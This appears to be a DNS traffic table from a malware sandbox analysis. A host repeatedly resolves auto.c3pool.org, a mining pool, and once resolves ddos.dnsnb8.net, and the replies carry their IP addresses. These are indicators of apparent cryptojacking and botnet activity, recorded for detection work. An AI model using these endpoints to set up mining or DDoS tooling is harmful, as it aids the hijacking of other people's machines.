                                                          Jul 25, 2024 12:02:33.161194086 CEST5705253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:33.378659010 CEST53570521.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:34.382622957 CEST5924453192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:34.394407988 CEST53592441.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:35.380345106 CEST5742053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:35.462176085 CEST53574201.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:36.382529974 CEST6134153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:36.392015934 CEST53613411.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:37.380928040 CEST6233553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:37.627830029 CEST53623351.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:38.645776987 CEST5734253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:38.657484055 CEST53573421.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:39.645586014 CEST5778953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:39.662760973 CEST53577891.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:40.662950993 CEST6542653192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:40.759813070 CEST53654261.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:41.756216049 CEST5203753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:41.979935884 CEST53520371.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:42.989684105 CEST4925253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:42.999197960 CEST53492521.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:43.989581108 CEST5232153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:44.002315044 CEST53523211.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:44.990056992 CEST6475753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:44.999610901 CEST53647571.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:45.989835024 CEST5002453192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:46.454554081 CEST53500241.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:47.459814072 CEST5684853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:47.634426117 CEST53568481.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:48.739620924 CEST5172353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:48.901732922 CEST53517231.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:49.739975929 CEST6445753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:49.751717091 CEST53644571.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:50.740645885 CEST6411453192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:51.250427961 CEST53641141.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:52.255629063 CEST5905153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:52.265348911 CEST53590511.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:53.270745993 CEST5730753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:53.364348888 CEST53573071.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:54.270809889 CEST5633953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:54.280977964 CEST53563391.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:55.286232948 CEST5167353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:55.298856974 CEST53516731.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:56.286535025 CEST6496153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:56.294533968 CEST53649611.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:57.301881075 CEST6335053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:57.403168917 CEST53633501.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:58.302088976 CEST5132653192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:58.312371016 CEST53513261.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:59.348089933 CEST5524353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:59.358144999 CEST53552431.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:00.349076033 CEST6337053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:00.366846085 CEST53633701.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:01.349868059 CEST5805253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:01.512070894 CEST53580521.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:02.364711046 CEST5443053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:02.373325109 CEST53544301.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:03.364912987 CEST5647253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:03.376569986 CEST53564721.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:04.380990028 CEST5702253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:04.391307116 CEST53570221.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:05.411453962 CEST5420553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:05.421170950 CEST53542051.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:06.411890030 CEST6547553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:06.419838905 CEST53654751.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:07.414388895 CEST6314953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:07.507802010 CEST53631491.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:08.427323103 CEST5500353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:08.436698914 CEST53550031.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:09.442576885 CEST5555953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:09.453562975 CEST53555591.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:10.443088055 CEST5955053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:10.452605963 CEST53595501.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:11.599633932 CEST6295253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:11.609930992 CEST53629521.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:12.599097967 CEST6194553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:12.607680082 CEST53619451.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:13.600505114 CEST5176953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:13.691914082 CEST5176953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:13.698661089 CEST53517691.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:13.771753073 CEST53517691.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:15.258119106 CEST5796853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:15.268265963 CEST53579681.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:16.257081985 CEST6123753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:16.265567064 CEST53612371.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:17.257148027 CEST6304853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:17.348299026 CEST6304853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:17.352531910 CEST53630481.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:17.356199026 CEST53630481.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:18.364696980 CEST6424053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:18.376652002 CEST53642401.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:19.366615057 CEST5346253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:19.375041962 CEST53534621.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:20.368551970 CEST5326853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:20.457652092 CEST5326853192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:20.464699984 CEST53532681.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:20.531657934 CEST53532681.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:22.225433111 CEST5486353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:22.262551069 CEST53548631.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:23.324403048 CEST5191253192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:23.358197927 CEST53519121.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:24.319945097 CEST6341953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:24.410690069 CEST6341953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:24.847480059 CEST53634191.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:24.847496033 CEST53634191.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:25.833746910 CEST6473153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:25.926315069 CEST6473153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:26.004996061 CEST53647311.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:26.005053043 CEST53647311.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:26.833252907 CEST5586553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:26.845427036 CEST53558651.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:27.834420919 CEST5466053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:27.926628113 CEST5466053192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:28.779844046 CEST53546601.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:28.780181885 CEST53546601.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:29.794543028 CEST6461453192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:29.893781900 CEST53646141.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:30.600023031 CEST6461453192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:30.607336998 CEST53646141.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:31.662549973 CEST6511553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:31.678342104 CEST53651151.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:03:32.683623075 CEST5058753192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:03:32.697575092 CEST53505871.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 25, 2024 11:59:27.472111940 CEST192.168.2.41.1.1.10x52baStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:28.165363073 CEST192.168.2.41.1.1.10x9f71Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:29.146353960 CEST192.168.2.41.1.1.10xe260Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:30.166480064 CEST192.168.2.41.1.1.10x2567Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:31.165967941 CEST192.168.2.41.1.1.10x31efStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:32.161283970 CEST192.168.2.41.1.1.10x5962Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:33.161194086 CEST192.168.2.41.1.1.10xd9c4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:34.382622957 CEST192.168.2.41.1.1.10x4755Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:35.380345106 CEST192.168.2.41.1.1.10xe17dStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:36.382529974 CEST192.168.2.41.1.1.10xcb22Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:37.380928040 CEST192.168.2.41.1.1.10xdbe4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:38.645776987 CEST192.168.2.41.1.1.10xcab2Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:39.645586014 CEST192.168.2.41.1.1.10x8e03Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:40.662950993 CEST192.168.2.41.1.1.10x2c51Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:41.756216049 CEST192.168.2.41.1.1.10x611aStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:42.989684105 CEST192.168.2.41.1.1.10xadffStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:43.989581108 CEST192.168.2.41.1.1.10xc0e0Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:44.990056992 CEST192.168.2.41.1.1.10x5100Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:45.989835024 CEST192.168.2.41.1.1.10x6d20Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:47.459814072 CEST192.168.2.41.1.1.10xc34Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:48.739620924 CEST192.168.2.41.1.1.10xbc81Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:49.739975929 CEST192.168.2.41.1.1.10xa6b7Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:50.740645885 CEST192.168.2.41.1.1.10x5cd1Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:52.255629063 CEST192.168.2.41.1.1.10xd438Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:53.270745993 CEST192.168.2.41.1.1.10x271cStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:54.270809889 CEST192.168.2.41.1.1.10x184fStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:55.286232948 CEST192.168.2.41.1.1.10xcadStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:56.286535025 CEST192.168.2.41.1.1.10xa6deStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:57.301881075 CEST192.168.2.41.1.1.10x546cStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:58.302088976 CEST192.168.2.41.1.1.10xb349Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:59.348089933 CEST192.168.2.41.1.1.10x30cfStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:00.349076033 CEST192.168.2.41.1.1.10x5a27Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:01.349868059 CEST192.168.2.41.1.1.10x83dStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:02.364711046 CEST192.168.2.41.1.1.10x7fe4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:03.364912987 CEST192.168.2.41.1.1.10xc838Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:04.380990028 CEST192.168.2.41.1.1.10x9324Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:05.411453962 CEST192.168.2.41.1.1.10xe1d5Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:06.411890030 CEST192.168.2.41.1.1.10x98f1Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:07.414388895 CEST192.168.2.41.1.1.10x9742Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:08.427323103 CEST192.168.2.41.1.1.10xf52fStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:09.442576885 CEST192.168.2.41.1.1.10x44e0Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:10.443088055 CEST192.168.2.41.1.1.10xe3c6Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:11.599633932 CEST192.168.2.41.1.1.10xeac8Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:12.599097967 CEST192.168.2.41.1.1.10xca32Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:13.600505114 CEST192.168.2.41.1.1.10xa468Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:13.691914082 CEST192.168.2.41.1.1.10xa468Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:15.258119106 CEST192.168.2.41.1.1.10x1a24Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:16.257081985 CEST192.168.2.41.1.1.10x3bdfStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.257148027 CEST192.168.2.41.1.1.10xe995Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.348299026 CEST192.168.2.41.1.1.10xe995Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:18.364696980 CEST192.168.2.41.1.1.10xdc1eStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:19.366615057 CEST192.168.2.41.1.1.10x2f68Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:20.368551970 CEST192.168.2.41.1.1.10xb5d4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:20.457652092 CEST192.168.2.41.1.1.10xb5d4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:22.225433111 CEST192.168.2.41.1.1.10x48f2Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:23.324403048 CEST192.168.2.41.1.1.10x7ab4Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.319945097 CEST192.168.2.41.1.1.10xd24Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.410690069 CEST192.168.2.41.1.1.10xd24Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:25.833746910 CEST192.168.2.41.1.1.10x1a31Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:25.926315069 CEST192.168.2.41.1.1.10x1a31Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.833252907 CEST192.168.2.41.1.1.10x64f6Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:27.834420919 CEST192.168.2.41.1.1.10x6922Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:27.926628113 CEST192.168.2.41.1.1.10x6922Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:29.794543028 CEST192.168.2.41.1.1.10x9868Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:30.600023031 CEST192.168.2.41.1.1.10x9868Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:31.662549973 CEST192.168.2.41.1.1.10x425dStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:32.683623075 CEST192.168.2.41.1.1.10x31deStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 25, 2024 11:59:27.481487989 CEST1.1.1.1192.168.2.40x52baNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:28.332082033 CEST1.1.1.1192.168.2.40x9f71No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:28.332082033 CEST1.1.1.1192.168.2.40x9f71No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:29.242415905 CEST1.1.1.1192.168.2.40xe260No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:29.242415905 CEST1.1.1.1192.168.2.40xe260No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:30.176345110 CEST1.1.1.1192.168.2.40x2567No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:30.176345110 CEST1.1.1.1192.168.2.40x2567No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:31.174592018 CEST1.1.1.1192.168.2.40x31efNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:31.174592018 CEST1.1.1.1192.168.2.40x31efNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:32.261459112 CEST1.1.1.1192.168.2.40x5962No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:32.261459112 CEST1.1.1.1192.168.2.40x5962No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:33.378659010 CEST1.1.1.1192.168.2.40xd9c4No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:33.378659010 CEST1.1.1.1192.168.2.40xd9c4No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:34.394407988 CEST1.1.1.1192.168.2.40x4755No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:34.394407988 CEST1.1.1.1192.168.2.40x4755No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:35.462176085 CEST1.1.1.1192.168.2.40xe17dNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:35.462176085 CEST1.1.1.1192.168.2.40xe17dNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:36.392015934 CEST1.1.1.1192.168.2.40xcb22No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:36.392015934 CEST1.1.1.1192.168.2.40xcb22No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:37.627830029 CEST1.1.1.1192.168.2.40xdbe4No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:37.627830029 CEST1.1.1.1192.168.2.40xdbe4No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:38.657484055 CEST1.1.1.1192.168.2.40xcab2No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:38.657484055 CEST1.1.1.1192.168.2.40xcab2No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:39.662760973 CEST1.1.1.1192.168.2.40x8e03No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:39.662760973 CEST1.1.1.1192.168.2.40x8e03No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:40.759813070 CEST1.1.1.1192.168.2.40x2c51No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:40.759813070 CEST1.1.1.1192.168.2.40x2c51No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:41.979935884 CEST1.1.1.1192.168.2.40x611aNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:41.979935884 CEST1.1.1.1192.168.2.40x611aNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:42.999197960 CEST1.1.1.1192.168.2.40xadffNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:42.999197960 CEST1.1.1.1192.168.2.40xadffNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:44.002315044 CEST1.1.1.1192.168.2.40xc0e0No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:44.002315044 CEST1.1.1.1192.168.2.40xc0e0No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:44.999610901 CEST1.1.1.1192.168.2.40x5100No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:44.999610901 CEST1.1.1.1192.168.2.40x5100No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:46.454554081 CEST1.1.1.1192.168.2.40x6d20No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:46.454554081 CEST1.1.1.1192.168.2.40x6d20No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:47.634426117 CEST1.1.1.1192.168.2.40xc34No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:47.634426117 CEST1.1.1.1192.168.2.40xc34No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:48.901732922 CEST1.1.1.1192.168.2.40xbc81No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:48.901732922 CEST1.1.1.1192.168.2.40xbc81No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:49.751717091 CEST1.1.1.1192.168.2.40xa6b7No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:49.751717091 CEST1.1.1.1192.168.2.40xa6b7No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:51.250427961 CEST1.1.1.1192.168.2.40x5cd1No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:51.250427961 CEST1.1.1.1192.168.2.40x5cd1No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:52.265348911 CEST1.1.1.1192.168.2.40xd438No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:52.265348911 CEST1.1.1.1192.168.2.40xd438No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:53.364348888 CEST1.1.1.1192.168.2.40x271cNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:53.364348888 CEST1.1.1.1192.168.2.40x271cNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:54.280977964 CEST1.1.1.1192.168.2.40x184fNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:54.280977964 CEST1.1.1.1192.168.2.40x184fNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:55.298856974 CEST1.1.1.1192.168.2.40xcadNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:55.298856974 CEST1.1.1.1192.168.2.40xcadNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
